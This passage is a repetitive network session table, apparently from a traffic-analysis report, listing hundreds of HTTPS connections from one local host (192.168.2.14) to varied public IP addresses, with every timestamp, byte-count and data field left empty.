                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17128192.168.2.1448564152.88.131.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17129192.168.2.1434980145.80.227.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17130192.168.2.1455996174.33.113.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17131192.168.2.143607614.28.9.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17132192.168.2.1448944113.133.187.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17133192.168.2.1447164203.176.91.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17134192.168.2.1456136172.210.250.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17135192.168.2.1440758184.192.163.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17136192.168.2.1456276207.235.202.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17137192.168.2.145445823.220.79.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17138192.168.2.1450308114.208.29.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17139192.168.2.1434240147.232.223.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17140192.168.2.1447878102.90.20.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17141192.168.2.1451820123.147.128.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17142192.168.2.1456638168.24.100.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17143192.168.2.1432778184.142.73.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17144192.168.2.144712267.157.83.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17145192.168.2.144193652.87.223.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17146192.168.2.1457708145.185.203.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17147192.168.2.1435350170.74.132.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17148192.168.2.14370449.126.189.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17149192.168.2.1459292104.74.90.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17150192.168.2.1459682211.247.212.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17151192.168.2.1448550140.193.121.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17152192.168.2.1456874151.150.98.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17153192.168.2.145659077.235.181.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17154192.168.2.145066447.79.189.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17155192.168.2.1436230192.159.69.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17156192.168.2.1439496201.123.251.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17157192.168.2.144794280.153.132.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17158192.168.2.1433388194.230.79.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17159192.168.2.1437414205.75.52.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17160192.168.2.146086461.136.187.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17161192.168.2.145835642.128.241.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17162192.168.2.1459796123.178.37.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17163192.168.2.1455396131.155.225.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17164192.168.2.1442052136.65.152.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17165192.168.2.145122024.181.221.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17166192.168.2.1436112161.10.74.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17167192.168.2.1456220148.241.142.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17168192.168.2.1441944125.46.137.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17169192.168.2.1449412196.103.204.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17170192.168.2.1433522195.102.129.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17171192.168.2.1448090124.114.225.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17172192.168.2.146065413.16.196.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17173192.168.2.1443702201.27.42.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17174192.168.2.145785657.131.163.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17175192.168.2.1450884193.163.40.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17176192.168.2.1433944130.201.21.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17177192.168.2.1448020195.222.50.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17178192.168.2.1447508182.209.245.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17179192.168.2.1441678219.243.206.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17180192.168.2.1453158125.81.86.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17181192.168.2.1451592179.134.0.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17182192.168.2.144810818.170.23.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17183192.168.2.143896296.25.160.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17184192.168.2.145128471.16.228.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17185192.168.2.1454658135.64.65.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17186192.168.2.1441220126.95.175.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17187192.168.2.145750069.8.135.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17188192.168.2.1457070158.41.37.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17189192.168.2.144657262.203.121.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17190192.168.2.1449568188.6.194.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17191192.168.2.143366297.48.20.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192192.168.2.144278653.100.127.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17193192.168.2.144899266.167.3.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17194192.168.2.14379969.199.142.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17195192.168.2.1436300213.38.34.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17196192.168.2.144614619.81.185.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17197192.168.2.1434352141.187.211.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17198192.168.2.1437176198.237.183.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17199192.168.2.1451062141.234.96.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17200192.168.2.145506850.72.108.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17201192.168.2.1434572140.27.122.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17202192.168.2.1435784102.84.133.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17203192.168.2.1440812191.54.237.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17204192.168.2.145849260.72.252.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17205192.168.2.1450340106.143.142.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17206192.168.2.144568252.23.177.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17207192.168.2.1446394206.97.173.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17208192.168.2.1456464141.30.51.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17209192.168.2.143704271.3.164.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17210192.168.2.1456978167.229.241.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17211192.168.2.1442986165.89.124.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17212192.168.2.145196652.96.78.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17213192.168.2.145167266.247.149.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17214192.168.2.1455904144.115.13.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17215192.168.2.145531239.147.157.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17216192.168.2.1448878109.232.122.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17217192.168.2.1433278152.141.118.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17218192.168.2.1456042219.66.172.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17219192.168.2.1453262121.139.125.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17220192.168.2.1457886140.123.236.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17221192.168.2.1441836120.187.164.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17222192.168.2.1450888106.211.203.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17223192.168.2.1459254191.10.186.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17224192.168.2.1444536118.5.160.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17225192.168.2.1453374193.67.120.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17226192.168.2.1455502210.224.125.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17227192.168.2.145087427.158.172.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17228192.168.2.143821836.177.224.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17229192.168.2.144059624.79.192.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17230192.168.2.1451888124.222.152.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17231192.168.2.1433546203.177.218.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17232192.168.2.1438968185.72.82.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17233192.168.2.1445262130.136.196.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17234192.168.2.144334041.169.201.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17235192.168.2.144015427.234.106.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17236192.168.2.1434768179.95.2.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17237192.168.2.1460004104.202.93.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17238192.168.2.14594604.225.137.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17239192.168.2.144707296.87.218.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17240192.168.2.1444494191.36.54.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17241192.168.2.143348691.158.21.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17242192.168.2.144846092.5.190.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17243192.168.2.1436938156.33.64.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17244192.168.2.145278214.112.217.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17245192.168.2.144180623.223.102.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17246192.168.2.1442608109.49.248.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17247192.168.2.143501884.69.201.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17248192.168.2.1439864125.164.73.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17249192.168.2.1455798132.251.134.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17250192.168.2.143335674.75.7.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17251192.168.2.1449066112.44.88.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17252192.168.2.1444622201.239.239.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17253192.168.2.1459690113.129.237.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17254192.168.2.145494887.38.38.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17255192.168.2.1457768167.155.237.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17256192.168.2.1455332105.232.236.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17257192.168.2.1453720146.117.247.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17258192.168.2.1452398132.180.10.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17259192.168.2.1460648193.23.0.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17260192.168.2.143994675.177.254.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17261192.168.2.1453386209.240.200.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17262192.168.2.145601076.136.149.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17263192.168.2.1433254118.175.3.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17264192.168.2.143619476.190.30.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17265192.168.2.14337729.45.117.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17266192.168.2.1445000115.158.114.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17267192.168.2.1449988223.123.195.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17268192.168.2.1443346220.138.250.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17269192.168.2.1442792126.225.38.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17270192.168.2.144621487.253.180.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17271192.168.2.145385860.133.190.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17272192.168.2.1453978134.232.217.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17273192.168.2.1448930187.54.178.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17274192.168.2.144489497.24.193.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17275192.168.2.1456434150.92.109.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17276192.168.2.145733851.190.7.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17277192.168.2.146087476.2.133.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17278192.168.2.1454752192.13.8.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17279192.168.2.144097859.193.86.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17280192.168.2.144341869.7.233.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17281192.168.2.145234623.108.204.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17282192.168.2.1439356137.119.86.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17283192.168.2.144280217.89.106.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17284192.168.2.1446982119.160.91.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17285192.168.2.14348869.185.247.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17286192.168.2.1436986180.101.213.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17287192.168.2.1444044220.41.15.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17288192.168.2.144866840.149.238.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17289192.168.2.143757424.240.89.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17290192.168.2.143300840.136.128.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17291192.168.2.1448288202.199.178.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17292192.168.2.1457628185.131.26.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17293192.168.2.1458528218.166.150.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17294192.168.2.143305068.225.128.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17295192.168.2.1437236138.237.80.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17296192.168.2.144606046.172.28.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17297192.168.2.143308285.142.109.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17298192.168.2.145908835.122.128.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17299192.168.2.145542631.126.203.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17300192.168.2.145419445.157.197.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17301192.168.2.145615676.86.59.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17302192.168.2.1450126136.106.48.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17303192.168.2.143890692.189.253.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17304192.168.2.145518679.125.146.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17305192.168.2.1456034179.246.244.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17306192.168.2.1458090189.47.34.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17307192.168.2.145183879.173.11.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17308192.168.2.143376679.14.138.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17309192.168.2.1445290153.189.247.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17310192.168.2.1436464171.77.115.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17311192.168.2.1448646104.118.101.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17312192.168.2.1437142168.244.73.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17313192.168.2.1460168118.149.165.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17314192.168.2.144359617.9.68.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17315192.168.2.1458110144.84.202.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17316192.168.2.144021080.177.44.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17317192.168.2.1457886129.39.51.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17318192.168.2.1452886115.133.185.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17319192.168.2.145256092.228.175.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17320192.168.2.1440426153.204.72.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17321192.168.2.1455164168.147.121.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17322192.168.2.1456620185.95.205.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17323192.168.2.144749820.153.62.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17324192.168.2.143779217.15.49.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17325192.168.2.1446854143.31.158.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17326192.168.2.1451558218.209.187.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17327192.168.2.14589744.144.243.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17328192.168.2.1451484222.9.34.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17329192.168.2.145724467.166.158.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17330192.168.2.145489048.147.205.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17331192.168.2.144316446.91.209.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17332192.168.2.145763070.172.227.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17333192.168.2.1454862120.196.98.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17334192.168.2.144197825.57.194.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17335192.168.2.1438344149.165.151.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17336192.168.2.1440050158.80.255.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17337192.168.2.146089814.8.66.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17338192.168.2.1446018116.207.107.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17339192.168.2.1454064148.112.186.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
